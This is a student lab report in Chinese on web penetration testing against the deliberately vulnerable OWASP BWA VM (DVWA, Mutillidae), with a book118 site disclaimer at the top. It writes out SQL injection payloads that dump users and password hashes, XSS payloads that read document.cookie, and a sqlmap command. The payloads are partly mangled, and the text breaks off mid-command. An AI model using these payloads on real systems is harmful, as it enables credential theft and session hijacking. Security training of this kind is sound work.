- 1、本文档共18页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
PAGE
PAGE 18
Web应用程序渗透测试
姓名:滕召维 学号一、实验目的
1. 学习使用OWASP BWA靶机。
2. 学习使用Kali Linux进行Web应用程序渗透测试。
二、实验内容
1. 使用w3af漏洞扫描器对OWASP BWA靶机进行漏洞扫描。
2. 根据老师的课堂讲授,按照课件相关内容在OWASP BWA靶机上实践XSS和SQL注入两种攻击。
3. 配合使用Tamper Data和sqlmap进行sql注入攻击。
4. 利用文件上传漏洞植入Webshell。
三、主要实验结果
(一)使用w3af漏洞扫描器对OWASP BWA靶机进行漏洞扫描
1. 启动w3af漏洞扫描器。
2. 编辑新建的Profile,也就是配置各种插件。
对audit类插件勾选sqli和xss两个插件,如下图:
对crawl类插件只勾选web_spider,如下图
对web_spider的配置在窗口右侧,勾选only_forward并保存,如下图
对output类插件,只勾选输出html文件。对输出文件的配置在窗口右侧,如下图输入文件名称并保存。这样扫描结果将保存在/root/dvwa.html文件中。
4. 如下图在Target一栏输入扫描的网址,单击右侧按钮start启动扫描。
扫描过程中
扫描结果
在OWASP BWA靶机上实践XSS和SQL注入两种攻击
1. 在Kali Linux攻击主机上,按照课件第29页,实践“通过SQL注入攻击绕过身份认证机制”。
2. XSS和SQL注入攻击
(1)在攻击机上访问/dvwa,按照 1. 的攻击方法,登录进入DVWA训练系统。
(2)首先按照图示将DVWA应用的安全等级设置为Low。
按照课件29-31页,实践SQL注入攻击。
使用OWASP BWA靶机的DVWA应用程序演示如何获取后台数据库更多的信息。
输入文件“XSSSQLi.txt”中的脚本。
?将数据表中的每一行都显示出来,输入: or 1=1
?查询INFORMATION_SCHEMA系统表,输入: UNION SELECT 1, table_name from INFORMATION_SCHEMA.tables --
?列出user表的内容,输入: UNION SELECT 1, column_name from INFORMATION_SCHEMA.columns where table_name = users --
④取得口令的MD5值,输入: UNION SELECT NULL, password from users --
⑤使用concat()函数将所有的信息都列出来,输入: UNION SELECT password, concat(first_name, , last_name, ,user) from users --
(4)按照课件第40页,实践反射式XSS攻击。
?输入script alert(Have funs)/script
?输入scriptalert(document.cookie)/script
按照课件第43页,访问/mutillidae,登录进入mutilidae训练系统,实践存储式XSS攻击。
访问Mutillidae的Cross Site Scripting (XSS)
输入:SCRIPT/XSS SRC=/xss.js/SCRIPT
xss.js的内容如下:
document.write (This is remote text via xss.js located at + document.cookie);
alert (This is remote text via xss.js located at + document.cookie);
首先按照sql注入攻击登录进入mutilidae训练系统
输入:SCRIPT/XSS SRC=/xss.js/SCRIPT
document.write (This is remote text via xss.js located at + document.cookie);
alert (This is remote text via xss.js located at + document.cookie);
(三)配合使用Tamper Data和sqlmap进行sql注入攻击
重复(二)中步骤2-(1)和2-(2)。
启动Tamper Data插件。
按照课件33页使用Sqlmap进行SQL注入攻击。
(1)扫描,输入:sqlmap -u 29/dvwa/vulnerabilities/sqli/?id=aaSubmit=Submit# --cookie=Ta
文档评论(0)